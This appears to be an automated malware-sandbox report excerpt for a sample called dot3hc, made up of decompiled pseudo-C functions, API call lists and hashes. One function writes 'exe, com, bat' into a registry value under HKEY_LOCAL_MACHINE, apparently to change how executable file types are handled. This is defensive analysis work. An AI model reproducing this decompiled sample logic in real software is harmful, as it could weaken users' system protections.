                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F226
                                                      • GlobalReAlloc.KERNEL32 ref: 0040F23D
                                                      • GlobalHandle.KERNEL32(005701C0), ref: 0040F24F
                                                      • GlobalLock.KERNEL32 ref: 0040F256
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F260
                                                      • GlobalLock.KERNEL32 ref: 0040F26C
                                                      • _memset.LIBCMT ref: 0040F285
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0040F2B1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                      • String ID:
                                                      • API String ID: 496899490-0
                                                      • Opcode ID: ab9b4bc25e8910a791046d6b5618164ea1d03aab9b28a44e83847fc91879861a
                                                      • Instruction ID: 472e247d442e6808826630594bb4930a6e592a8447ca6d80117307b8de69ac9d
                                                      • Opcode Fuzzy Hash: ab9b4bc25e8910a791046d6b5618164ea1d03aab9b28a44e83847fc91879861a
                                                      • Instruction Fuzzy Hash: D031AD79204B049FD724CF64DC48A67B7E8FB84344B00497EE852E3A91EB39F9488B18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 96%
                                                      			E0040B3B1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				_Unknown_base(*)()* _t31;
                                                      				void* _t33;
                                                      				void* _t34;
                                                      				long _t39;
                                                      				void* _t40;
                                                      				void* _t43;
                                                      				void* _t60;
                                                      				void* _t64;
                                                      				struct HWND__* _t66;
                                                      				CHAR* _t68;
                                                      				void* _t71;
                                                      
                                                      				_t64 = __edx;
                                                      				_t60 = __ecx;
                                                      				_push(0x40);
                                                      				E0041F71D(E00432451, __ebx, __edi, __esi);
                                                      				_t66 =  *(_t71 + 8);
                                                      				_t68 = "AfxOldWndProc423";
                                                      				_t31 = GetPropA(_t66, _t68);
                                                      				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
                                                      				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                      				 *(_t71 - 0x18) = _t31;
                                                      				_t58 = 1;
                                                      				_t33 =  *(_t71 + 0xc) - 6;
                                                      				if(_t33 == 0) {
                                                      					_t34 = E00409C97(1, _t60, _t71,  *(_t71 + 0x14));
                                                      					E0040B2C5(_t60, E00409C97(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
                                                      					goto L9;
                                                      				} else {
                                                      					_t40 = _t33 - 0x1a;
                                                      					if(_t40 == 0) {
                                                      						_t58 = 0 | E0040B33B(1, _t66, E00409C97(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
                                                      						L9:
                                                      						if(_t58 != 0) {
                                                      							goto L10;
                                                      						}
                                                      					} else {
                                                      						_t43 = _t40 - 0x62;
                                                      						if(_t43 == 0) {
                                                      							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
                                                      							RemovePropA(_t66, _t68);
                                                      							GlobalDeleteAtom(GlobalFindAtomA(_t68));
                                                      							goto L10;
                                                      						} else {
                                                      							if(_t43 != 0x8e) {
                                                      								L10:
                                                      								_t39 = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14)); // executed
                                                      								 *(_t71 - 0x14) = _t39;
                                                      							} else {
                                                      								E004089E1(E00409C97(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
                                                      								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                      								E0040A26C(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return E0041F7C2( *(_t71 - 0x14));
                                                      			}















                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 0040B3B8
                                                      • GetPropA.USER32 ref: 0040B3C7
                                                      • CallWindowProcA.USER32 ref: 0040B421
                                                        • Part of subcall function 0040A26C: GetWindowRect.USER32 ref: 0040A294
                                                        • Part of subcall function 0040A26C: GetWindow.USER32(?,00000004), ref: 0040A2B1
                                                      • SetWindowLongA.USER32 ref: 0040B448
                                                      • RemovePropA.USER32 ref: 0040B450
                                                      • GlobalFindAtomA.KERNEL32 ref: 0040B457
                                                      • GlobalDeleteAtom.KERNEL32 ref: 0040B45E
                                                        • Part of subcall function 004089E1: GetWindowRect.USER32 ref: 004089ED
                                                      • CallWindowProcA.USER32 ref: 0040B4B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                      • String ID: AfxOldWndProc423
                                                      • API String ID: 2702501687-1060338832
                                                      • Opcode ID: 01eafed39850b2931418d763da063fa8131308eeaf296203092cb49c53425a31
                                                      • Instruction ID: 0993d68df0da385a064f2654fdce3d9da4ed98816b6640c1b1e46963a59409c9
                                                      • Opcode Fuzzy Hash: 01eafed39850b2931418d763da063fa8131308eeaf296203092cb49c53425a31
                                                      • Instruction Fuzzy Hash: 40316D7280020AABCB01AFA4DD49DFF7E78EF45310F00013AF941B21A2C7789A119BA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 91%
                                                      			E00401450(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                      				char _v8;
                                                      				char _v16;
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				char _v303;
                                                      				char _v304;
                                                      				char _v2351;
                                                      				char _v2352;
                                                      				signed int _v2356;
                                                      				intOrPtr* _v2360;
                                                      				intOrPtr* _v2364;
                                                      				intOrPtr _v2392;
                                                      				intOrPtr _v2416;
                                                      				intOrPtr _v2420;
                                                      				intOrPtr _v2444;
                                                      				intOrPtr _v2448;
                                                      				struct HINSTANCE__* _v2452;
                                                      				intOrPtr* _v2456;
                                                      				void* __ebp;
                                                      				signed int _t101;
                                                      				signed int _t102;
                                                      				intOrPtr _t111;
                                                      				void* _t112;
                                                      				intOrPtr _t113;
                                                      				void* _t114;
                                                      				intOrPtr _t115;
                                                      				void* _t116;
                                                      				intOrPtr _t117;
                                                      				void* _t118;
                                                      				char _t119;
                                                      				intOrPtr _t129;
                                                      				struct HICON__* _t138;
                                                      				void* _t141;
                                                      				char _t183;
                                                      				void* _t201;
                                                      				void* _t202;
                                                      				signed int _t203;
                                                      				void* _t204;
                                                      				void* _t205;
                                                      				void* _t207;
                                                      
                                                      				_t209 = __eflags;
                                                      				_t202 = __esi;
                                                      				_t201 = __edi;
                                                      				_t141 = __ebx;
                                                      				_push(0xffffffff);
                                                      				_push(E00431ADC);
                                                      				_push( *[fs:0x0]);
                                                      				_t205 = _t204 - 0x988;
                                                      				_t101 =  *0x443590; // 0x8ffedb05
                                                      				_t102 = _t101 ^ _t203;
                                                      				_v36 = _t102;
                                                      				_push(_t102);
                                                      				 *[fs:0x0] =  &_v16;
                                                      				_v2456 = __ecx;
                                                      				E00405CC0(_v2456, 0x67, _a4);
                                                      				_v8 = 0;
                                                      				 *_v2456 = 0x434b2c;
                                                      				_v2360 = _v2456 + 0x78;
                                                      				E0040899E(_v2360, __eflags);
                                                      				 *_v2360 = 0x4349f4;
                                                      				_v8 = 1;
                                                      				_v2364 = _v2456 + 0xcc;
                                                      				E0040899E(_v2364, _t209);
                                                      				 *_v2364 = 0x4349f4;
                                                      				_v8 = 2;
                                                      				E00402890(_v2456 + 0x12c);
                                                      				_v8 = 3;
                                                      				E00402890(_v2456 + 0x134);
                                                      				_v8 = 4;
                                                      				_v24 = 0;
                                                      				_v2356 = 0;
                                                      				_v32 = 0;
                                                      				_v20 = 0;
                                                      				_v28 = 0;
                                                      				_t111 =  *0x442014; // 0x43463c
                                                      				_t112 = E004024B0(_v2456,  &_v24, _t111); // executed
                                                      				if(_t112 == 0) {
                                                      					_v32 = 0 | _v24 != 0x00000000;
                                                      				}
                                                      				_t113 =  *0x442018; // 0x434620
                                                      				_t114 = E004024B0(_v2456,  &_v24, _t113); // executed
                                                      				if(_t114 == 0) {
                                                      					_v20 = 0 | _v24 != 0x00000000;
                                                      				}
                                                      				_t115 =  *0x44201c; // 0x434600
                                                      				_t116 = E004024B0(_v2456,  &_v24, _t115); // executed
                                                      				if(_t116 == 0) {
                                                      					_v28 = 0 | _v24 != 0x00000000;
                                                      				}
                                                      				_t117 =  *0x44200c; // 0x434670
                                                      				_t118 = E004024B0(_v2456,  &_v24, _t117); // executed
                                                      				if(_t118 == 0) {
                                                      					_v2356 = 0 | _v24 != 0x00000000;
                                                      				}
                                                      				_t119 =  *0x4349e8; // 0x0
                                                      				_v2352 = _t119;
                                                      				E0041F330(_t201,  &_v2351, 0, 0x7ff);
                                                      				_t183 =  *0x4349e8; // 0x0
                                                      				_v304 = _t183;
                                                      				E0041F330(_t201,  &_v303, 0, 0x103);
                                                      				_t207 = _t205 + 0x18;
                                                      				E004025F0(_v2456,  &_v2352); // executed
                                                      				E00402750(_v2456,  &_v304); // executed
                                                      				 *(_v2456 + 0x130) = _v2356;
                                                      				 *(_v2456 + 0x120) = _v32;
                                                      				 *(_v2456 + 0x124) = _v20;
                                                      				 *(_v2456 + 0x128) = _v28;
                                                      				_v2416 = _v2456 + 0x12c;
                                                      				if( &_v2352 != 0) {
                                                      					_t129 = E0041F2A0( &_v2352);
                                                      					_t207 = _t207 + 4;
                                                      					_v2392 = _t129;
                                                      				} else {
                                                      					_v2392 = 0;
                                                      				}
                                                      				E00402B10(_t141, _v2416,  &_v2352, _v2392);
                                                      				_v2444 = _v2456 + 0x134;
                                                      				_t223 =  &_v304;
                                                      				if( &_v304 != 0) {
                                                      					_v2420 = E0041F2A0( &_v304);
                                                      				} else {
                                                      					_v2420 = 0;
                                                      				}
                                                      				E00402B10(_t141, _v2444,  &_v304, _v2420);
                                                      				_v2448 =  *((intOrPtr*)(E0040DB94(_t141, _t201, _t202, _t223) + 4));
                                                      				_v2452 =  *((intOrPtr*)(E0040DB94(_t141, _t201, _t202, _t223) + 0xc));
                                                      				_t138 = LoadIconA(_v2452, 0x65); // executed
                                                      				 *(_v2456 + 0x74) = _t138;
                                                      				_v8 = 0xffffffff;
                                                      				 *[fs:0x0] = _v16;
                                                      				return E0041E5DF(_v2456, _t141, _v36 ^ _t203, _v2452, _t201, _t202);
                                                      			}














































                                                      0x004016fb
                                                      0x00401730
                                                      0x0040173d
                                                      0x0040174b
                                                      0x0040175a
                                                      0x00401766
                                                      0x00401769
                                                      0x00401779
                                                      0x0040178e

                                                      APIs
                                                        • Part of subcall function 00405CC0: _memset.LIBCMT ref: 00405CD7
                                                        • Part of subcall function 004024B0: RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00401561,00000000,0043463C), ref: 004024E8
                                                        • Part of subcall function 004024B0: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,?,00000000,00000004), ref: 0040251D
                                                        • Part of subcall function 004024B0: RegCloseKey.KERNELBASE(00000000), ref: 00402545
                                                      • _memset.LIBCMT ref: 004015FC
                                                      • _memset.LIBCMT ref: 0040161E
                                                      • _strlen.LIBCMT ref: 004016B8
                                                      • _strlen.LIBCMT ref: 0040170E
                                                      • LoadIconA.USER32(00000000,00000065), ref: 0040175A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: _memset$_strlen$CloseCreateIconLoadQueryValue
                                                      • String ID: FC$<FC$pFC
                                                      • API String ID: 615173687-2136651500
                                                      • Opcode ID: c09a520e972cbed81c92c8a8f446ce9723face874d1e5d1072ee138f9bd11dab
                                                      • Instruction ID: 457884dcc3c456c3af197bac72be006a206e89a30ea0593d6f0c271eb38810d0
                                                      • Opcode Fuzzy Hash: c09a520e972cbed81c92c8a8f446ce9723face874d1e5d1072ee138f9bd11dab
                                                      • Instruction Fuzzy Hash: F3915AB49021189BEB15DF69CD51BEEB7B1AF88308F0041EDE50967382DB786E85CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 418 40619f-4061b5 call 41f71d 421 4061c2-4061e6 call 40db94 call 40c572 * 2 418->421 422 4061b7-4061bf call 40db94 418->422 431 406213 421->431 432 4061e8-4061f8 421->432 422->421 433 406216-406218 431->433 435 4061fa-4061fc 432->435 438 406201-406211 432->438 433->435 436 40621a-40624f call 40ea5e call 40320e call 410cb1 433->436 439 406387-40638c call 41f7c2 435->439 448 406251-406253 436->448 449 406285-406287 436->449 438->433 450 406255-40625f GetSystemMetrics 448->450 451 406289-4062bb call 410c7a call 410bd8 call 4108f1 call 4108e3 448->451 449->451 452 4062c8-4062db call 40b748 449->452 450->452 453 406261-406279 call 406177 450->453 451->452 477 4062bd-4062c6 GlobalLock 451->477 461 4062e1 452->461 462 4062dd-4062df 452->462 453->452 464 40627b-406280 453->464 465 4062e4-4062fd CreateDialogIndirectParamA call 403036 461->465 462->465 464->449 467 406282 464->467 470 406302-406329 465->470 467->449 473 406343-40634a call 409d3f 470->473 474 40632b-406336 470->474 481 406356-406358 473->481 482 40634c-40634e 473->482 474->473 480 406338-40633b 474->480 477->452 480->473 483 406369-40636c 481->483 484 40635a-40635e 481->484 482->481 486 406380-406384 483->486 487 40636e-40637a GlobalUnlock GlobalFree 483->487 484->483 485 406360-406367 DestroyWindow 484->485 485->483 486->439 487->486
                                                      C-Code - Quality: 97%
                                                      			E0040619F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t65;
                                                      				signed int _t72;
                                                      				signed int _t74;
                                                      				struct HWND__* _t75;
                                                      				struct HWND__* _t76;
                                                      				signed int _t78;
                                                      				signed int _t95;
                                                      				intOrPtr* _t103;
                                                      				signed int _t110;
                                                      				void* _t124;
                                                      				signed int _t129;
                                                      				DLGTEMPLATE* _t130;
                                                      				struct HWND__* _t131;
                                                      				void* _t132;
                                                      
                                                      				_t128 = __esi;
                                                      				_t124 = __edx;
                                                      				_t104 = __ecx;
                                                      				_push(0x3c);
                                                      				E0041F71D(E00431E1E, __ebx, __edi, __esi);
                                                      				_t103 = __ecx;
                                                      				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
                                                      				_t136 =  *(_t132 + 0x10);
                                                      				if( *(_t132 + 0x10) == 0) {
                                                      					 *(_t132 + 0x10) =  *(E0040DB94(__ecx, 0, __esi, _t136) + 0xc);
                                                      				}
                                                      				_t129 =  *(E0040DB94(_t103, 0, _t128, _t136) + 0x3c);
                                                      				 *(_t132 - 0x28) = _t129;
                                                      				 *(_t132 - 0x14) = 0;
                                                      				 *(_t132 - 4) = 0;
                                                      				E0040C572(_t103, _t104, 0, _t129, _t136, 0x10); // executed
                                                      				E0040C572(_t103, _t104, 0, _t129, _t136, 0x7c000);
                                                      				if(_t129 == 0) {
                                                      					_t130 =  *(_t132 + 8);
                                                      					L7:
                                                      					__eflags = _t130;
                                                      					if(_t130 == 0) {
                                                      						L4:
                                                      						_t65 = 0;
                                                      						L32:
                                                      						return E0041F7C2(_t65);
                                                      					}
                                                      					E0040320E(_t132 - 0x1c, E0040EA5E());
                                                      					 *(_t132 - 4) = 1;
                                                      					 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                      					__eflags = E00410CB1(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
                                                      					__eflags =  *0x4465cc; // 0x0
                                                      					_t72 = 0 | __eflags == 0x00000000;
                                                      					if(__eflags == 0) {
                                                      						L14:
                                                      						__eflags = _t72;
                                                      						if(__eflags == 0) {
                                                      							L17:
                                                      							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
                                                      							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
                                                      							E0040B748(0, __eflags, _t103);
                                                      							_t74 =  *(_t132 + 0xc);
                                                      							__eflags = _t74;
                                                      							if(_t74 != 0) {
                                                      								_t75 =  *(_t74 + 0x20);
                                                      							} else {
                                                      								_t75 = 0;
                                                      							}
                                                      							_t76 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E00405BFB, 0); // executed
                                                      							_t131 = _t76;
                                                      							E00403036( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
                                                      							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
                                                      							_t110 =  *(_t132 - 0x28);
                                                      							__eflags = _t110;
                                                      							if(__eflags != 0) {
                                                      								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
                                                      								__eflags = _t131;
                                                      								if(__eflags != 0) {
                                                      									 *((intOrPtr*)( *_t103 + 0x12c))(0);
                                                      								}
                                                      							}
                                                      							_t78 = E00409D3F(_t103, 0, __eflags);
                                                      							__eflags = _t78;
                                                      							if(_t78 == 0) {
                                                      								 *((intOrPtr*)( *_t103 + 0x114))();
                                                      							}
                                                      							__eflags = _t131;
                                                      							if(_t131 != 0) {
                                                      								__eflags =  *(_t103 + 0x3c) & 0x00000010;
                                                      								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
                                                      									DestroyWindow(_t131);
                                                      									_t131 = 0;
                                                      									__eflags = 0;
                                                      								}
                                                      							}
                                                      							__eflags =  *(_t132 - 0x14);
                                                      							if( *(_t132 - 0x14) != 0) {
                                                      								GlobalUnlock( *(_t132 - 0x14));
                                                      								GlobalFree( *(_t132 - 0x14));
                                                      							}
                                                      							__eflags = _t131;
                                                      							_t59 = _t131 != 0;
                                                      							__eflags = _t59;
                                                      							_t65 = 0 | _t59;
                                                      							goto L32;
                                                      						}
                                                      						L15:
                                                      						E00410C7A(_t103, _t132 - 0x38, 0, _t132, _t130);
                                                      						 *(_t132 - 4) = 2;
                                                      						E00410BD8(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
                                                      						 *(_t132 - 0x14) = E004108F1(_t132 - 0x38);
                                                      						 *(_t132 - 4) = 1;
                                                      						E004108E3(_t132 - 0x38);
                                                      						__eflags =  *(_t132 - 0x14);
                                                      						if(__eflags != 0) {
                                                      							_t130 = GlobalLock( *(_t132 - 0x14));
                                                      						}
                                                      						goto L17;
                                                      					}
                                                      					__eflags = _t72;
                                                      					if(_t72 != 0) {
                                                      						goto L15;
                                                      					}
                                                      					__eflags = GetSystemMetrics(0x2a);
                                                      					if(__eflags == 0) {
                                                      						goto L17;
                                                      					}
                                                      					_t95 = E00406177(_t132 - 0x1c, "MS Shell Dlg");
                                                      					__eflags = _t95;
                                                      					_t72 = 0 | _t95 == 0x00000000;
                                                      					__eflags = _t72;
                                                      					if(__eflags == 0) {
                                                      						goto L17;
                                                      					}
                                                      					__eflags =  *((short*)(_t132 - 0x18)) - 8;
                                                      					if( *((short*)(_t132 - 0x18)) == 8) {
                                                      						 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                      					}
                                                      					goto L14;
                                                      				}
                                                      				_push(_t132 - 0x48);
                                                      				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
                                                      					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
                                                      					goto L7;
                                                      				}
                                                      				goto L4;
                                                      			}


















                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 004061A6
                                                      • GetSystemMetrics.USER32 ref: 00406257
                                                      • GlobalLock.KERNEL32 ref: 004062C0
                                                      • CreateDialogIndirectParamA.USER32(?,?,?,00405BFB,00000000), ref: 004062EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                      • String ID: MS Shell Dlg
                                                      • API String ID: 1736106359-76309092
                                                      • Opcode ID: 3e4b4bade944808363b2727e551b547ef92d40d9d0212ec3b94de52b8e46ff9f
                                                      • Instruction ID: 0bc490b1034fbbaea528403df064128feb745a9c2e9583e38ab2a070d1ec2b36
                                                      • Opcode Fuzzy Hash: 3e4b4bade944808363b2727e551b547ef92d40d9d0212ec3b94de52b8e46ff9f
                                                      • Instruction Fuzzy Hash: B651BE309002059BCF15EFA4C8859EEBBB4AF44314F15427EF812B72D1DB789A95CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 488 4025f0-402635 RegCreateKeyExA 489 402637-402675 call 41eb60 RegQueryValueExA 488->489 490 4026ab-4026b1 488->490 493 4026a1-4026a5 RegCloseKey 489->493 494 402677-40269e lstrlenA RegSetValueExA 489->494 493->490 494->493
                                                      C-Code - Quality: 100%
                                                      			E004025F0(intOrPtr __ecx, CHAR* _a4) {
                                                      				void* _v8;
                                                      				int _v12;
                                                      				long _v16;
                                                      				int _v20;
                                                      				int _v24;
                                                      				intOrPtr _v28;
                                                      				long _t28;
                                                      				int _t31;
                                                      				char* _t38;
                                                      				char* _t41;
                                                      				char* _t44;
                                                      
                                                      				_v28 = __ecx;
                                                      				_v8 = 0;
                                                      				_v16 = 0;
                                                      				_t41 =  *0x442000; // 0x4346d4
                                                      				_v16 = RegCreateKeyExA(0x80000002, _t41, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
                                                      				if(_v16 == 0) {
                                                      					_v24 = 0x800;
                                                      					E0041EB60(_a4, "exe, com, bat");
                                                      					_t38 =  *0x442010; // 0x43465c
                                                      					_t28 = RegQueryValueExA(_v8, _t38, 0,  &_v20, _a4,  &_v24); // executed
                                                      					_v16 = _t28;
                                                      					if(_v16 != 0) {
                                                      						_t31 = lstrlenA(_a4);
                                                      						_t44 =  *0x442010; // 0x43465c
                                                      						_v16 = RegSetValueExA(_v8, _t44, 0, 1, _a4, _t31 + 1);
                                                      					}
                                                      					RegCloseKey(_v8);
                                                      				}
                                                      				return _v16;
                                                      			}














                                                      APIs
                                                      • RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00401638), ref: 00402628
                                                      • _strcat.LIBCMT ref: 00402647
                                                      • RegQueryValueExA.KERNELBASE(00000000,0043465C,00000000,?,00401638,00000800), ref: 00402668
                                                      • lstrlenA.KERNEL32(00401638), ref: 0040267B
                                                      • RegSetValueExA.ADVAPI32(00000000,0043465C,00000000,00000001,00401638,-00000001), ref: 00402698
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004026A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Value$CloseCreateQuery_strcatlstrlen
                                                      • String ID: \FC$exe, com, bat
                                                      • API String ID: 1958970598-4041655066
                                                      • Opcode ID: 1831c4f7d6f73dd4213caa599944f0336715ca713a20f07bf892c109c3f6860d
                                                      • Instruction ID: 0991be1bcda026a765b55682184bd2232a476c29beda41f33cbd04d81c06e64f
                                                      • Opcode Fuzzy Hash: 1831c4f7d6f73dd4213caa599944f0336715ca713a20f07bf892c109c3f6860d
                                                      • Instruction Fuzzy Hash: F4212CB9E00208FBDB14CFD4DD49FEEB7B8AB48701F108459FA15A7280D6796A04CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 100%
                                                      			E0040EF65(void* __ecx) {
                                                      				int _t5;
                                                      				struct HDC__* _t18;
                                                      				void* _t19;
                                                      
                                                      				_t19 = __ecx; // executed
                                                      				_t5 = GetSystemMetrics(0xb); // executed
                                                      				 *((intOrPtr*)(_t19 + 8)) = _t5;
                                                      				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
                                                      				 *0x446578 = GetSystemMetrics(2) + 1;
                                                      				 *0x44657c = GetSystemMetrics(3) + 1;
                                                      				_t18 = GetDC(0);
                                                      				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
                                                      				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
                                                      				return ReleaseDC(0, _t18);
                                                      			}






                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL ref: 0040EF72
                                                      • GetSystemMetrics.USER32 ref: 0040EF79
                                                      • GetSystemMetrics.USER32 ref: 0040EF80
                                                      • GetSystemMetrics.USER32 ref: 0040EF8A
                                                      • GetDC.USER32(00000000), ref: 0040EF94
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040EFA5
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040EFAD
                                                      • ReleaseDC.USER32 ref: 0040EFB5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                      • String ID:
                                                      • API String ID: 1031845853-0
                                                      • Opcode ID: 994e65a5f7cf09011eb91012667e9cd424a14e7951b27da859b39b4ce86ef113
                                                      • Instruction ID: 97755fa7e18ea7b352d67f311e11813537151e1edd7cb95964a28bf73efd48b3
                                                      • Opcode Fuzzy Hash: 994e65a5f7cf09011eb91012667e9cd424a14e7951b27da859b39b4ce86ef113
                                                      • Instruction Fuzzy Hash: 59F09070A40700AEE3206F72AC49F677BB4EBC6B62F01443AE6518B2D0C7B5A8018F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 76%
